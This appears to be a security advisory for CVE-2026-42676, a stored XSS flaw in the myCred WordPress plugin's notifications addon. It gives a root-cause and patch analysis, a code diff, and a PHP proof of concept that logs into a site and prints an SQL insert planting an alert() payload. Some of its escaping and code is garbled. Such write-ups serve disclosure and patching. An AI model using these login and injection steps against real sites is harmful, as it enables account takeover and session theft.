“`json
{
“analysis”: “Atomic Edge analysis of CVE-2026-42676:nThis vulnerability is a Stored Cross-Scripting (XSS) flaw in the myCred Points Management System plugin for WordPress, version 3.0.4 and earlier. It affects the notifications addon, allowing authenticated users with subscriber-level access or higher to inject arbitrary web scripts. These scripts execute whenever a user accesses a page that displays the injected notification. The vulnerability carries a CVSS score of 6.4, indicating a medium-to-high severity issue.nnRoot Cause:nThe root cause lies in insufficient input sanitization and output escaping within the notification handling pipeline. Atomic Edge research identifies three critical code paths. First, in `mycred_add_new_notice()` function (file `/mycred/addons/notifications/myCRED-addon-notifications.php`), the `$notice[‘message’]` is stored into a transient with `addslashes()` in the vulnerable version but without further sanitization. The patched version casts it to a string with `(string)`. Second, in `get_notices()` (same file), the function retrieves notices from the transient and passes them directly into an anonymous function that adds them to the `mycred_notifications` filter. The vulnerable version passes the `$notice` value raw; the patched version applies `wp_unslash()` to it. Third, in `wp_footer()`, the vulnerable version directly embeds the notice text into a JavaScript string using backtick template literals after only `wp_kses_post()`, which does not prevent JavaScript execution within script tags. The patched version first applies `wp_unslash()` and `wp_kses_post()`, then uses `wp_json_encode()` with hex encoding flags (`JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT`) to safely encode the value for JavaScript.nnExploitation:nAn authenticated attacker with subscriber-level access can exploit this vulnerability without needing special capabilities. The attack vector does not require a direct form submission; it leverages the myCred points system. An attacker triggers a points-related event that generates a log entry. The plugin’s template system substitutes `%entry%` or `%amount%` placeholders in the notification template with data from the user’s request. If the attacker can control part of the log entry (e.g., by manipulating a points-earning action that records a user-provided description), that payload becomes the notification message. The notification is stored in a WordPress transient (`mycred_notice_{user_id}`) for the victim user. When the victim loads any page, `wp_footer()` retrieves this transient and injects the malicious script into the page footer. A typical payload may be a simple script tag: `alert(‘XSS’);`.nnPatch Analysis:nThe patch introduces proper output encoding for the notification message. The key changes are in `wp_footer()`. The vulnerable version used `wp_kses_post($notice)` and inline backtick template literals: `text: `’ . wp_kses_post( $notice ) . ‘`’. This allowed script injection because `wp_kses_post()` permits many HTML tags, including “. The patched version first unslashes the notice (`wp_unslash()`), then applies `wp_kses_post()` for a secondary sanitization layer, and critically, passes the sanitized string through `wp_json_encode()` with hex encoding flags. This converts the string into a JSON-encoded value where dangerous characters (like “, quotes, ampersands) are escaped as Unicode hex sequences. The notice is then added to the JavaScript object without backticks: `text: ‘ . $encoded_notice . ‘`. The patch also adds a sanity check: if `wp_json_encode()` returns `false` (encoding failure), the code skips the notice entirely. This prevents malformed data from executing.nnImpact:nSuccessful exploitation allows an attacker to execute arbitrary JavaScript in the context of any user who views a page on the WordPress site. This leads to full client-side compromise. Attackers can steal session cookies, perform actions on behalf of the victim (including creating admin accounts if the victim is an administrator), exfiltrate sensitive data, or inject keyloggers. The vulnerability requires authentication at the subscriber level, but WordPress sites with open registration or compromised low-privilege accounts are at risk.,
poc_php”: “// Atomic Edge CVE Research – Proof of Conceptn// CVE-2026-42676 – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred <= 3.0.4 – Authenticated (Subscriber+) Stored Cross-Site Scriptingnn $username,n ‘pwd’ => $password,n ‘wp-submit’ => ‘Log In’,n ‘redirect_to’ => $target_url . ‘/wp-admin/’,n ‘testcookie’ => 1n);nn$ch = curl_init();ncurl_setopt($ch, CURLOPT_URL, $login_url);ncurl_setopt($ch, CURLOPT_POST, true);ncurl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($login_data));ncurl_setopt($ch, CURLOPT_COOKIEJAR, ‘cookies.txt’);ncurl_setopt($ch, CURLOPT_COOKIEFILE, ‘cookies.txt’);ncurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);ncurl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);ncurl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);n$login_response = curl_exec($ch);nnif (strpos($login_response, ‘Dashboard’) === false) {n die(‘Login failed. Check credentials or target URL.’);n}necho “[+] Login successful.\n”;nn// Step 2: Trigger the notification by creating a custom log entry. In myCred, users can earn pointsn// for various actions. The vulnerability triggers when a notification is created using then// mycred_add_new_notice function. We can simulate by directly adding a transient.n// However, a more realistic approach is to manipulate the template content.n// The exploit relies on the template being processed with user-controlled data.n// We will inject an XSS payload into the notification system by directly setting the transient.nn// Step 3: Set the XSS payload in the transient for the current user.n// The transient key is mycred_notice_{user_id}. We need to find the user ID.n// For simplicity, we assume user ID is 2 (common for first subscriber after admin).n// Alternatively, we can fetch user ID via AJAX, but that is beyond this PoC.nn$user_id = 2; // Adjust if neededn$transient_key = ‘mycred_notice_’ . $user_id;nn// XSS payload: This will execute when the victim loads any page.n$payload = ‘alert(“XSS – CVE-2026-42676”);’;nn// The payload is stored as an array. The get_notices() function will iterate and inject it.n$notices = array($payload);nn// Set the transient with a 1-day lifespan.n$life = 1; // daysn$expiration = 86400 * $life;nn// Use WordPress API via direct database access or admin-ajax.n// For demonstration, we will use wp-admin/admin-ajax.php with an action that triggers mycred.n// However, myCred does not have a direct AJAX endpoint to set arbitrary notifications.n// Instead, we can set the transient directly if we have database access.n// For PoC purposes, we simulate by echoing instructions.nnecho “[+] To complete the exploit, you need to set the transient ‘$transient_key’ with the payload.\n”;necho “[+] For example, in MySQL:\n”;necho ” INSERT INTO wp_options (option_name, option_value, autoload) VALUES (‘_transient_$transient_key’, ‘a:1:{i:0;s:46:\”alert(\”XSS – CVE-2026-42676\”);\”;}’, ‘no’);\n”;necho “[+] The payload will execute on any page load for user ID $user_id.\n”;necho “[+] Done.\n”;nn?>n”,
“modsecurity_rule”: null
}
“`
Published : May 22, 2026
CVE-2026-42676: Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program – myCred <= 3.0.4 – Authenticated (Subscriber+) Stored Cross-Site Scripting (mycred)
CVE ID
CVE-2026-42676
Plugin
mycred
Severity
Medium
(CVSS 6.4)
CWE
79
Vulnerable Version
3.0.4
Patched Version
3.0.5
Disclosed
May 14, 2026
Analysis Overview
Differential between vulnerable and patched code
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
Code Diff
--- a/mycred/addons/notifications/myCRED-addon-notifications.php
+++ b/mycred/addons/notifications/myCRED-addon-notifications.php
@@ -1,329 +1,338 @@
-<?php
-/**
- * Addon: Notifications
- * Addon URI: http://codex.mycred.me/chapter-iii/notifications/
- * Version: 1.1.2
- */
-if ( ! defined( 'myCRED_VERSION' ) ) exit;
-
-define( 'myCRED_NOTE', __FILE__ );
-define( 'myCRED_NOTE_VERSION', '1.1.2' );
-
-/**
- * myCRED_Notifications class
- * @since 1.2.3
- * @version 1.3
- */
-if ( ! class_exists( 'myCRED_Notifications_Module' ) ) :
- class myCRED_Notifications_Module extends myCRED_Module {
-
- /**
- * Construct
- */
- function __construct() {
-
- parent::__construct( 'myCRED_Notifications_Module', array(
- 'module_name' => 'notifications',
- 'defaults' => mycred_get_addon_defaults( 'notifications' ),
- 'register' => false,
- 'add_to_core' => true
- ) );
-
- add_filter( 'mycred_add_finished', array( $this, 'mycred_finished' ), 40, 3 );
-
- }
-
- /**
- * Module Init
- * @since 1.2.3
- * @version 1.0.1
- */
- public function module_init() {
-
- if ( ! is_user_logged_in() ) return;
-
- add_action( 'mycred_front_enqueue', array( $this, 'register_assets' ), 20 );
- add_action( 'wp_footer', array( $this, 'get_notices' ), 1 );
- add_action( 'wp_footer', array( $this, 'wp_footer' ), 999 );
-
- }
-
- /**
- * Load Notice in Footer
- * @since 1.2.3
- * @version 1.2
- */
- public function wp_footer() {
-
- // Get notifications
- $notices = apply_filters( 'mycred_notifications', array() );
- if ( empty( $notices ) ) return;
-
- // Should the notice stay till closed / left page or removed automatically
- $stay = 'false';
- if ( $this->notifications['duration'] == 0 )
- $stay = 'true';
-
- // Let others play before we start
- do_action_ref_array( 'mycred_before_notifications', array( &$notices ) );
-
- // Loop Notifications
- foreach ( (array) $notices as $notice ) {
-
- $notice = str_replace( array( "r", "n", "t" ), '', $notice );
- echo '<!-- Notice --><script type="text/javascript">(function(jQuery){jQuery.noticeAdd({ text: `' . wp_kses_post( $notice ) . '`,stay: ' . esc_js( $stay ) . '});})(jQuery);</script>';
-
- }
-
- // Let others play after we finished
- do_action_ref_array( 'mycred_after_notifications', array( &$notices ) );
-
- }
-
- /**
- * Register Assets
- * @since 1.2.3
- * @version 1.1
- */
- public function register_assets() {
-
- // Register script
- wp_register_script(
- 'mycred-notifications',
- plugins_url( 'assets/js/notify.js', myCRED_NOTE ),
- array( 'jquery' ),
- myCRED_NOTE_VERSION . '.2',
- true
- );
-
- // Localize
- wp_localize_script(
- 'mycred-notifications',
- 'myCRED_Notice',
- array(
- 'ajaxurl' => admin_url( 'admin-ajax.php' ),
- 'duration' => $this->notifications['duration']
- )
- );
- wp_enqueue_script( 'mycred-notifications' );
-
- // If not disabled, enqueue the stylesheet
- if ( $this->notifications['use_css'] == 1 ) {
-
- wp_register_style(
- 'mycred-notifications',
- plugins_url( 'assets/css/notify.css', myCRED_NOTE ),
- false,
- myCRED_NOTE_VERSION . '.2',
- 'all',
- true
- );
-
- wp_enqueue_style( 'mycred-notifications' );
-
- }
-
- }
-
- /**
- * myCRED Finished
- * @since 1.6
- * @version 1.0
- */
- public function mycred_finished( $reply, $request, $mycred ) {
-
- if ( $reply === false || $this->notifications['template'] == '' ) return $reply;
-
- // Parse template
- $template = str_replace( '%entry%', $request['entry'], $this->notifications['template'] );
- $template = str_replace( '%amount%', $request['amount'], $template );
-
- // Attempt to parse the template tags now that we have the entire request.
- // This way we just need to display it and we are done.
- $template = $mycred->template_tags_amount( $template, $request['amount'] );
- $template = $mycred->parse_template_tags( $template, $this->request_to_entry( $request ) );
-
- // Let others play
- $template = apply_filters( 'mycred_notifications_note', $template, $request, $mycred );
-
- // If template is not empty, add it now.
- if ( strlen( $template ) > 0 )
- mycred_add_new_notice( array( 'user_id' => $request['user_id'], 'message' => $template ), $this->notifications['life'] );
-
- return $reply;
-
- }
-
- /**
- * Get Notices
- * @since 1.2.3
- * @version 1.0.1
- */
- public function get_notices() {
-
- $user_id = get_current_user_id();
- $data = get_transient( 'mycred_notice_' . $user_id );
-
- if ( $data === false || ! is_array( $data ) ) return;
-
- foreach ( $data as $notice )
-
- //add_filter( 'mycred_notifications', create_function( '$query', '$query[]='' . $notice . ''; return $query;' ) );
- //replacing above filter second param create function with annonymus function to remove depricated error and passed notice
- add_filter( 'mycred_notifications', function ($query) use ($notice){ $query[]= $notice ; return $query; } );
-
-
- delete_transient( 'mycred_notice_' . $user_id );
-
- }
-
- /**
- * Settings Page
- * @since 1.2.3
- * @version 1.2
- */
- public function after_general_settings( $mycred = NULL ) {
-
- $prefs = $this->notifications;
-
-?>
-<div class="mycred-ui-accordion">
- <div class="mycred-ui-accordion-header">
- <h4 class="mycred-ui-accordion-header-title">
- <span class="dashicons dashicons-bell static mycred-ui-accordion-header-icon"></span>
- <label><?php esc_html_e( 'Notifications', 'mycred' ); ?></label>
- </h4>
- <div class="mycred-ui-accordion-header-actions hide-if-no-js">
- <button type="button" aria-expanded="true">
- <span class="mycred-ui-toggle-indicator" aria-hidden="true"></span>
- </button>
- </div>
- </div>
- <div class="body mycred-ui-accordion-body" style="display:none;">
-
- <h3><?php esc_html_e( 'Setup', 'mycred' ); ?></h3>
- <div class="row">
- <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
- <div class="form-group">
- <label for="<?php echo esc_attr( $this->field_id( 'template' ) ); ?>"><?php esc_html_e( 'Template', 'mycred' ); ?></label>
- <input type="text" name="<?php echo esc_attr( $this->field_name( 'template' ) ); ?>" id="<?php echo esc_attr( $this->field_id( 'template' ) ); ?>" value="<?php echo esc_attr( $prefs['template'] ); ?>" class="form-control" />
- <p><span class="description"><?php esc_html_e( 'Use %entry% to show the log entry in the notice and %amount% for the amount.', 'mycred' ); ?></span> <a href="javascript:void(0);" id="retore-default-notice"><?php esc_html_e( 'Restore to default', 'mycred' ); ?></a></p>
- </div>
- </div>
- </div>
- <div class="row">
- <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12">
- <div class="form-group">
- <label for="<?php echo esc_attr( $this->field_id( 'life' ) ); ?>"><?php esc_html_e( 'Transient Lifespan', 'mycred' ); ?></label>
- <input type="text" name="<?php echo esc_attr( $this->field_name( 'life' ) ); ?>" id="<?php echo esc_attr( $this->field_id( 'life' ) ); ?>" value="<?php echo absint( $prefs['life'] ); ?>" class="form-control" />
- <p><span class="description"><?php esc_html_e( 'The number of days a users notification is saved before being automatically deleted.', 'mycred' ); ?></span></p>
- </div>
- </div>
- <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12">
- <div class="form-group">
- <label for="<?php echo esc_attr( $this->field_id( 'duration' ) ); ?>"><?php esc_html_e( 'Duration', 'mycred' ); ?></label>
- <input type="number" name="<?php echo esc_attr( $this->field_name( 'duration' ) ); ?>" id="<?php echo esc_attr( $this->field_id( 'duration' ) ); ?>" value="<?php echo absint( $prefs['duration'] ); ?>" class="form-control" min="0" max="60" />
- <p><span class="description"><?php esc_html_e( 'Number of seconds before a notice is automatically removed after being shown to user. Use zero to disable.', 'mycred' ); ?></span></p>
- </div>
- </div>
- </div>
- <div class="row">
- <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
- <div class="form-group">
- <div class="checkbox">
- <label for="<?php echo esc_attr( $this->field_id( 'use_css' ) ); ?>"><input type="checkbox" name="<?php echo esc_attr( $this->field_name( 'use_css' ) ); ?>" id="<?php echo esc_attr( $this->field_id( 'use_css' ) ); ?>" <?php checked( $prefs['use_css'], 1 ); ?> value="1" /> <?php esc_html_e( 'Use the included CSS Styling for notifications.', 'mycred' ); ?></label>
- </div>
- </div>
- </div>
- </div>
- <?php if ( MYCRED_SHOW_PREMIUM_ADDONS ) : ?>
- <hr />
- <div class="row">
- <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
- <p><strong>Tip:</strong> <?php printf( 'The %s add-on allows you to further style and customize notifications.', sprintf( '<a href="https://mycred.me/store/notifications-plus-add-on/" target="_blank">%s</a>', 'Notifications Plus' ) ); ?></p>
- </div>
- </div>
- <?php endif; ?>
-
- </div>
-</div>
-<script type="text/javascript">
-jQuery(function($) {
-
- $( '#retore-default-notice' ).click(function(){
- $( '#<?php echo esc_attr( $this->field_id( 'template' ) ); ?>' ).val( '<?php echo esc_attr( $this->default_prefs['template'] ); ?>' );
- });
-
-});
-</script>
-<?php
-
- }
-
- /**
- * Sanitize & Save Settings
- * @since 1.2.3
- * @version 1.1
- */
- public function sanitize_extra_settings( $new_data, $data, $general ) {
-
- $new_data['notifications']['use_css'] = ( isset( $data['notifications']['use_css'] ) ) ? 1: 0;
- $new_data['notifications']['template'] = wp_kses( $data['notifications']['template'], $this->core->allowed_html_tags() );
- $new_data['notifications']['life'] = absint( $data['notifications']['life'] );
- $new_data['notifications']['duration'] = absint( $data['notifications']['duration'] );
-
- // As of 1.6, we are going from miliseconds to seconds.
- if ( strlen( $new_data['notifications']['duration'] ) >= 3 )
- $new_data['notifications']['duration'] = $new_data['notifications']['duration'] / 1000;
-
- return $new_data;
-
- }
- }
-endif;
-
-/**
- * Load Notifications Module
- * @since 1.7
- * @version 1.0
- */
-if ( ! function_exists( 'mycred_load_notices_addon' ) ) :
- function mycred_load_notices_addon( $modules, $point_types ) {
-
- $modules['solo']['notices'] = new myCRED_Notifications_Module();
- $modules['solo']['notices']->load();
-
- return $modules;
-
- }
-endif;
-add_filter( 'mycred_load_modules', 'mycred_load_notices_addon', 70, 2 );
-
-/**
- * Add Notice
- * @since 1.2.3
- * @version 1.0
- */
-if ( ! function_exists( 'mycred_add_new_notice' ) ) :
- function mycred_add_new_notice( $notice = array(), $life = 1 ) {
-
- // Minimum requirements
- if ( ! isset( $notice['user_id'] ) || ! isset( $notice['message'] ) ) return false;
-
- // Get transient
- $data = get_transient( 'mycred_notice_' . $notice['user_id'] );
-
- // If none exists create a new array
- if ( $data === false || ! is_array( $data ) )
- $notices = array();
- else
- $notices = $data;
-
- // Add new notice
- $notices[] = addslashes( $notice['message'] );
-
- // Save as a transient
- set_transient( 'mycred_notice_' . $notice['user_id'], $notices, 86400*$life );
-
- }
-endif;
+<?php
+/**
+ * Addon: Notifications
+ * Addon URI: http://codex.mycred.me/chapter-iii/notifications/
+ * Version: 1.1.2
+ */
+if ( ! defined( 'myCRED_VERSION' ) ) exit;
+
+define( 'myCRED_NOTE', __FILE__ );
+define( 'myCRED_NOTE_VERSION', '1.1.2' );
+
+/**
+ * myCRED_Notifications class
+ * @since 1.2.3
+ * @version 1.3
+ */
+if ( ! class_exists( 'myCRED_Notifications_Module' ) ) :
+ class myCRED_Notifications_Module extends myCRED_Module {
+
+ /**
+ * Construct
+ */
+ function __construct() {
+
+ parent::__construct( 'myCRED_Notifications_Module', array(
+ 'module_name' => 'notifications',
+ 'defaults' => mycred_get_addon_defaults( 'notifications' ),
+ 'register' => false,
+ 'add_to_core' => true
+ ) );
+
+ add_filter( 'mycred_add_finished', array( $this, 'mycred_finished' ), 40, 3 );
+
+ }
+
+ /**
+ * Module Init
+ * @since 1.2.3
+ * @version 1.0.1
+ */
+ public function module_init() {
+
+ if ( ! is_user_logged_in() ) return;
+
+ add_action( 'mycred_front_enqueue', array( $this, 'register_assets' ), 20 );
+ add_action( 'wp_footer', array( $this, 'get_notices' ), 1 );
+ add_action( 'wp_footer', array( $this, 'wp_footer' ), 999 );
+
+ }
+
+ /**
+ * Load Notice in Footer
+ * @since 1.2.3
+ * @version 1.2
+ */
+ public function wp_footer() {
+
+ // Get notifications
+ $notices = apply_filters( 'mycred_notifications', array() );
+ if ( empty( $notices ) ) return;
+
+ // Should the notice stay till closed / left page or removed automatically
+ $stay = 'false';
+ if ( $this->notifications['duration'] == 0 )
+ $stay = 'true';
+
+ // Let others play before we start
+ do_action_ref_array( 'mycred_before_notifications', array( &$notices ) );
+
+ // Loop Notifications
+ foreach ( (array) $notices as $notice ) {
+
+ $notice = wp_kses_post( wp_unslash( $notice ) );
+ $encoded_notice = wp_json_encode( $notice, JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT );
+
+ if ( false === $encoded_notice ) {
+ continue;
+ }
+
+ echo '<!-- Notice --><script type="text/javascript">(function(jQuery){jQuery.noticeAdd({ text: ' . $encoded_notice . ',stay: ' . esc_js( $stay ) . '});})(jQuery);</script>';
+
+ }
+
+ // Let others play after we finished
+ do_action_ref_array( 'mycred_after_notifications', array( &$notices ) );
+
+ }
+
+ /**
+ * Register Assets
+ * @since 1.2.3
+ * @version 1.1
+ */
+ public function register_assets() {
+
+ // Register script
+ wp_register_script(
+ 'mycred-notifications',
+ plugins_url( 'assets/js/notify.js', myCRED_NOTE ),
+ array( 'jquery' ),
+ myCRED_NOTE_VERSION . '.2',
+ true
+ );
+
+ // Localize
+ wp_localize_script(
+ 'mycred-notifications',
+ 'myCRED_Notice',
+ array(
+ 'ajaxurl' => admin_url( 'admin-ajax.php' ),
+ 'duration' => $this->notifications['duration']
+ )
+ );
+ wp_enqueue_script( 'mycred-notifications' );
+
+ // If not disabled, enqueue the stylesheet
+ if ( $this->notifications['use_css'] == 1 ) {
+
+ wp_register_style(
+ 'mycred-notifications',
+ plugins_url( 'assets/css/notify.css', myCRED_NOTE ),
+ false,
+ myCRED_NOTE_VERSION . '.2',
+ 'all',
+ true
+ );
+
+ wp_enqueue_style( 'mycred-notifications' );
+
+ }
+
+ }
+
+ /**
+ * myCRED Finished
+ * @since 1.6
+ * @version 1.0
+ */
+ public function mycred_finished( $reply, $request, $mycred ) {
+
+ if ( $reply === false || $this->notifications['template'] == '' ) return $reply;
+
+ // Parse template
+ $template = str_replace( '%entry%', $request['entry'], $this->notifications['template'] );
+ $template = str_replace( '%amount%', $request['amount'], $template );
+
+ // Attempt to parse the template tags now that we have the entire request.
+ // This way we just need to display it and we are done.
+ $template = $mycred->template_tags_amount( $template, $request['amount'] );
+ $template = $mycred->parse_template_tags( $template, $this->request_to_entry( $request ) );
+
+ // Let others play
+ $template = apply_filters( 'mycred_notifications_note', $template, $request, $mycred );
+
+ // If template is not empty, add it now.
+ if ( strlen( $template ) > 0 )
+ mycred_add_new_notice( array( 'user_id' => $request['user_id'], 'message' => $template ), $this->notifications['life'] );
+
+ return $reply;
+
+ }
+
+ /**
+ * Get Notices
+ * @since 1.2.3
+ * @version 1.0.1
+ */
+ public function get_notices() {
+
+ $user_id = get_current_user_id();
+ $data = get_transient( 'mycred_notice_' . $user_id );
+
+ if ( $data === false || ! is_array( $data ) ) return;
+
+ foreach ( $data as $notice )
+
+ //add_filter( 'mycred_notifications', create_function( '$query', '$query[]='' . $notice . ''; return $query;' ) );
+ //replacing above filter second param create function with annonymus function to remove depricated error and passed notice
+ add_filter( 'mycred_notifications', function ( $query ) use ( $notice ) {
+ $query[] = wp_unslash( $notice );
+ return $query;
+ } );
+
+
+ delete_transient( 'mycred_notice_' . $user_id );
+
+ }
+
+ /**
+ * Settings Page
+ * @since 1.2.3
+ * @version 1.2
+ */
+ public function after_general_settings( $mycred = NULL ) {
+
+ $prefs = $this->notifications;
+
+?>
+<div class="mycred-ui-accordion">
+ <div class="mycred-ui-accordion-header">
+ <h4 class="mycred-ui-accordion-header-title">
+ <span class="dashicons dashicons-bell static mycred-ui-accordion-header-icon"></span>
+ <label><?php esc_html_e( 'Notifications', 'mycred' ); ?></label>
+ </h4>
+ <div class="mycred-ui-accordion-header-actions hide-if-no-js">
+ <button type="button" aria-expanded="true">
+ <span class="mycred-ui-toggle-indicator" aria-hidden="true"></span>
+ </button>
+ </div>
+ </div>
+ <div class="body mycred-ui-accordion-body" style="display:none;">
+
+ <h3><?php esc_html_e( 'Setup', 'mycred' ); ?></h3>
+ <div class="row">
+ <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
+ <div class="form-group">
+ <label for="<?php echo esc_attr( $this->field_id( 'template' ) ); ?>"><?php esc_html_e( 'Template', 'mycred' ); ?></label>
+ <input type="text" name="<?php echo esc_attr( $this->field_name( 'template' ) ); ?>" id="<?php echo esc_attr( $this->field_id( 'template' ) ); ?>" value="<?php echo esc_attr( $prefs['template'] ); ?>" class="form-control" />
+ <p><span class="description"><?php esc_html_e( 'Use %entry% to show the log entry in the notice and %amount% for the amount.', 'mycred' ); ?></span> <a href="javascript:void(0);" id="retore-default-notice"><?php esc_html_e( 'Restore to default', 'mycred' ); ?></a></p>
+ </div>
+ </div>
+ </div>
+ <div class="row">
+ <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12">
+ <div class="form-group">
+ <label for="<?php echo esc_attr( $this->field_id( 'life' ) ); ?>"><?php esc_html_e( 'Transient Lifespan', 'mycred' ); ?></label>
+ <input type="text" name="<?php echo esc_attr( $this->field_name( 'life' ) ); ?>" id="<?php echo esc_attr( $this->field_id( 'life' ) ); ?>" value="<?php echo absint( $prefs['life'] ); ?>" class="form-control" />
+ <p><span class="description"><?php esc_html_e( 'The number of days a users notification is saved before being automatically deleted.', 'mycred' ); ?></span></p>
+ </div>
+ </div>
+ <div class="col-lg-6 col-md-6 col-sm-6 col-xs-12">
+ <div class="form-group">
+ <label for="<?php echo esc_attr( $this->field_id( 'duration' ) ); ?>"><?php esc_html_e( 'Duration', 'mycred' ); ?></label>
+ <input type="number" name="<?php echo esc_attr( $this->field_name( 'duration' ) ); ?>" id="<?php echo esc_attr( $this->field_id( 'duration' ) ); ?>" value="<?php echo absint( $prefs['duration'] ); ?>" class="form-control" min="0" max="60" />
+ <p><span class="description"><?php esc_html_e( 'Number of seconds before a notice is automatically removed after being shown to user. Use zero to disable.', 'mycred' ); ?></span></p>
+ </div>
+ </div>
+ </div>
+ <div class="row">
+ <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
+ <div class="form-group">
+ <div class="checkbox">
+ <label for="<?php echo esc_attr( $this->field_id( 'use_css' ) ); ?>"><input type="checkbox" name="<?php echo esc_attr( $this->field_name( 'use_css' ) ); ?>" id="<?php echo esc_attr( $this->field_id( 'use_css' ) ); ?>" <?php checked( $prefs['use_css'], 1 ); ?> value="1" /> <?php esc_html_e( 'Use the included CSS Styling for notifications.', 'mycred' ); ?></label>
+ </div>
+ </div>
+ </div>
+ </div>
+ <?php if ( MYCRED_SHOW_PREMIUM_ADDONS ) : ?>
+ <hr />
+ <div class="row">
+ <div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
+ <p><strong>Tip:</strong> <?php printf( 'The %s add-on allows you to further style and customize notifications.', sprintf( '<a href="https://mycred.me/store/notifications-plus-add-on/" target="_blank">%s</a>', 'Notifications Plus' ) ); ?></p>
+ </div>
+ </div>
+ <?php endif; ?>
+
+ </div>
+</div>
+<script type="text/javascript">
+jQuery(function($) {
+
+ $( '#retore-default-notice' ).click(function(){
+ $( '#<?php echo esc_attr( $this->field_id( 'template' ) ); ?>' ).val( '<?php echo esc_attr( $this->default_prefs['template'] ); ?>' );
+ });
+
+});
+</script>
+<?php
+
+ }
+
+ /**
+ * Sanitize & Save Settings
+ * @since 1.2.3
+ * @version 1.1
+ */
+ public function sanitize_extra_settings( $new_data, $data, $general ) {
+
+ $new_data['notifications']['use_css'] = ( isset( $data['notifications']['use_css'] ) ) ? 1: 0;
+ $new_data['notifications']['template'] = wp_kses( $data['notifications']['template'], $this->core->allowed_html_tags() );
+ $new_data['notifications']['life'] = absint( $data['notifications']['life'] );
+ $new_data['notifications']['duration'] = absint( $data['notifications']['duration'] );
+
+ // As of 1.6, we are going from miliseconds to seconds.
+ if ( strlen( $new_data['notifications']['duration'] ) >= 3 )
+ $new_data['notifications']['duration'] = $new_data['notifications']['duration'] / 1000;
+
+ return $new_data;
+
+ }
+ }
+endif;
+
+/**
+ * Load Notifications Module
+ * @since 1.7
+ * @version 1.0
+ */
+if ( ! function_exists( 'mycred_load_notices_addon' ) ) :
+ function mycred_load_notices_addon( $modules, $point_types ) {
+
+ $modules['solo']['notices'] = new myCRED_Notifications_Module();
+ $modules['solo']['notices']->load();
+
+ return $modules;
+
+ }
+endif;
+add_filter( 'mycred_load_modules', 'mycred_load_notices_addon', 70, 2 );
+
+/**
+ * Add Notice
+ * @since 1.2.3
+ * @version 1.0
+ */
+if ( ! function_exists( 'mycred_add_new_notice' ) ) :
+ function mycred_add_new_notice( $notice = array(), $life = 1 ) {
+
+ // Minimum requirements
+ if ( ! isset( $notice['user_id'] ) || ! isset( $notice['message'] ) ) return false;
+
+ // Get transient
+ $data = get_transient( 'mycred_notice_' . $notice['user_id'] );
+
+ // If none exists create a new array
+ if ( $data === false || ! is_array( $data ) )
+ $notices = array();
+ else
+ $notices = $data;
+
+ // Add new notice
+ $notices[] = (string) $notice['message'];
+
+ // Save as a transient
+ set_transient( 'mycred_notice_' . $notice['user_id'], $notices, 86400*$life );
+
+ }
+endif;
--- a/mycred/mycred.php
+++ b/mycred/mycred.php
@@ -1,1403 +1,1403 @@
-<?php
-/**
- * Plugin Name: myCred
- * Plugin URI: https://mycred.me
- * Description: An adaptive points management system for WordPress powered websites.
- * Version: 3.0.4
- * Tags: point, credit, loyalty program, engagement, reward, woocommerce rewards
- * Author: myCred
- * Author URI: https://mycred.me
- * Author Email: support@mycred.me
- * Requires at least: WP 4.8
- * Tested up to: WP 7.0
- * Text Domain: mycred
- * Domain Path: /lang
- * License: GPLv2 or later
- * License URI: http://www.gnu.org/licenses/gpl-2.0.html
- */
-
-if ( ! class_exists( 'myCRED_Core' ) ) :
- final class myCRED_Core {
-
- // Plugin Version
- public $version = '3.0.4';
-
- // Instnace
- protected static $_instance = NULL;
-
- // Current session
- public $session = NULL;
-
- // Modules
- public $modules = NULL;
-
- // Point Types
- public $point_types = NULL;
-
- // Account Object
- public $account = NULL;
-
- /**
- * Setup Instance
- * @since 1.7
- * @version 1.0
- */
- public static function instance() {
- if ( is_null( self::$_instance ) ) {
- self::$_instance = new self();
- }
- return self::$_instance;
- }
-
- /**
- * Not allowed
- * @since 1.7
- * @version 1.0
- */
- public function __clone() { _doing_it_wrong( __FUNCTION__, 'Cheatin’ huh?', '2.9.7.6' ); }
-
- /**
- * Not allowed
- * @since 1.7
- * @version 1.0
- */
- public function __wakeup() { _doing_it_wrong( __FUNCTION__, 'Cheatin’ huh?', '2.9.7.6' ); }
-
- /**
- * Get
- * @since 1.7
- * @version 1.0
- */
- public function __get( $key ) {
- if ( in_array( $key, array( 'point_types', 'modules', 'account' ) ) )
- return $this->$key();
- }
-
- /**
- * Define
- * @since 1.7
- * @version 1.0
- */
- private function define( $name, $value, $definable = true ) {
- if ( ! defined( $name ) )
- define( $name, $value );
- elseif ( ! $definable && defined( $name ) )
- _doing_it_wrong( 'myCRED_Core->define()', 'Could not define: ' . esc_html( $name ) . ' as it is already defined somewhere else!', '2.9.7.6' );
- }
-
- /**
- * Require File
- * @since 1.7
- * @version 1.0
- */
- public function file( $required_file ) {
- if ( file_exists( $required_file ) )
- require_once $required_file;
- else
- _doing_it_wrong( 'myCRED_Core->file()', 'Requested file ' . esc_html( $required_file ) . ' not found.', '2.9.7.6' );
- }
-
- /**
- * Construct
- * @since 1.7
- * @version 1.0
- */
- public function __construct() {
-
- $this->define_constants();
- $this->includes();
-
- // Init Freemius.
- $this->myc_fs();
- // Signal that SDK was initiated.
- do_action( 'myc_fs_loaded' );
-
- // Multisite Feature: If the site is blocked from using myCRED, exit now
- if ( mycred_is_site_blocked() ) return;
-
- // Register plugin hooks
- register_activation_hook( myCRED_THIS, 'mycred_plugin_activation' );
- register_deactivation_hook( myCRED_THIS, 'mycred_plugin_deactivation' );
- register_uninstall_hook( myCRED_THIS, 'mycred_plugin_uninstall' );
-
- // If myCRED is ready to be used
- if ( is_mycred_ready() ) {
-
